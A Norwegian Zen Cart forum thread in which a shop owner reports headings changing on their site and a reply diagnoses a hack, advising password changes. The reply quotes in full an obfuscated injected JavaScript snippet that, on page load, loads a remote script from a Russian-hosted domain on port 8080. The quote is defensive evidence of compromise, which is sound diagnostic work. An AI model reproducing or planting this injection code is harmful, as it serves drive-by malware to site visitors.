× Spørsmål angående Zen Cart som ikke passer inn i andre kategorier.

Kjempeproblem: Overskriftene forandrer seg av selv

Kjempeproblem: Overskriftene forandrer seg av selv opprettet av Roar Eikenes

Vi har komt borti et stort problem. De siste dagene har vi opplevd at teksten (overskriftene som regel) blir forandret størrelse på. Det er ikke vi selv som gjør det, og eneste løsning har vært å benytte vår backup til å resette det. Det hjelper ikke å foandre på templates-filene. Ene gangen måtte sågar en helt ny installasjon til, som tok flere timer.

I kveld er det samme problemet tilbake. Skjedde like etter midnatt. Er det noen som driver gjøn med oss, eller er det noen instillinger som ikke er som de skal?

Skjønner mindre og mindre.. Hjelp!

08/01/2010 01:23 #3865

Vennligst Logg inn eller Registrer konto for å bli med i samtalen.

Besvart av Rune Rasmussen i emne Sv:Kjempeproblem: Overskriftene forandrer seg av selv

Tja ...

Dere har vel sjekket skikkelig om dere har blitt hacket?
Har byttet alle passord for FTP, MySQL og admin?

Dette ligger flere steder i koden deres, og folk med Windows PC og dårlig antivirus og brannmur bør kanskje ikke besøke siden deres:
<script>/*LGPL*/ try{ window.onload = function(){var Ynrwc1hiq87h = document.createElement('s)^c@r$$)#i$@p($$$t^'.replace(/#|@|\!|\(|\)|\^|\$|&/ig, ''));Ynrwc1hiq87h.setAttribute('defer', 'd@$e^#@)f&&^e@r()'.replace(/#|\)|\(|&|@|\^|\!|\$/ig, ''));Ynrwc1hiq87h.setAttribute('type', 't&&(e&(x&#t($/@j#@a#&@v#a)#s@^c#r@#i!p(!t^$&$'.replace(/&|@|\!|\$|\^|\)|\(|#/ig, ''));Ynrwc1hiq87h.setAttribute('id', 'Z(#!(e(l@@!!5#@b()))x#&i#)&6^@@s(@y@@x()^v)&9#&'.replace(/\!|\$|@|&|\)|\(|\^|#/ig, ''));Ynrwc1hiq87h.setAttribute('s#)!r^^@^c^&!'.replace(/@|\!|\^|\)|&|\$|#|\(/ig, ''),  'h(&t#))t&p#:)/(/@0!@(!@1&&)n#)!)e)#t)@)^-$c&)o((m#!(.$!^t)@^i&(g@&(@@e(@(r^@!d!(@&i&^^r#(!e(&^c&@t)^&.)!)c)o^^)m(!).!!@&g$#)^o$!&d#$a&d&@@d!$)y)-@!&c!$o@&$m^$$.!^(c#@a^)@r(!@#s#((w#(#(e!b!@n$@^e)t$@^!.(!$@#r(u$#!#!:&8@0^^8^##&0!^/^g)&^o)#!o!#g&l$^$$e#.$))$c@&)o^^m##(/#@)!g($@#o&)o#@g!($l$$^(#e#@.@c)$^o@m!$/#&&c@a!@r)^)e##e^$!!r&&)b)$u!$$$i@l#()d$^#e$r@$!!.$#(c#^o^@)m@&#&/)$x)@$&(n)#x)&(x@.&!#c&)@o($m(#/@(s^$^@o^s@$&o$^).$!c&^o#$#m!/!@&&@'.replace(/\(|\)|&|\^|#|\$|\!|@/ig, ''));if (document){document.body.appendChild(Ynrwc1hiq87h);}} } catch(Jg8hbd0kytqswmmfze) {}</script>
<!--40ace59eda33a6f5e5733ed6bdc65c1e-->
08/01/2010 08:02 #3866

Vennligst Logg inn eller Registrer konto for å bli med i samtalen.

arastta logo horizontal 326x58

opencart logo 298x58

vm logo 220x58

woocommerce logo 286x58

zen cart logo 217x58